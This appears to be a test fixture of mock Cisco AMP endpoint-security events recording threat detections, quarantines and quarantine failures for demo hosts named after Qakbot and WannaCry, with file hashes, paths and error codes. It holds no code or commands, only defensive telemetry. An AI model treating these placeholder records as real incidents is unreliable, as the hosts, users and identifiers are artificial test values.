+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} 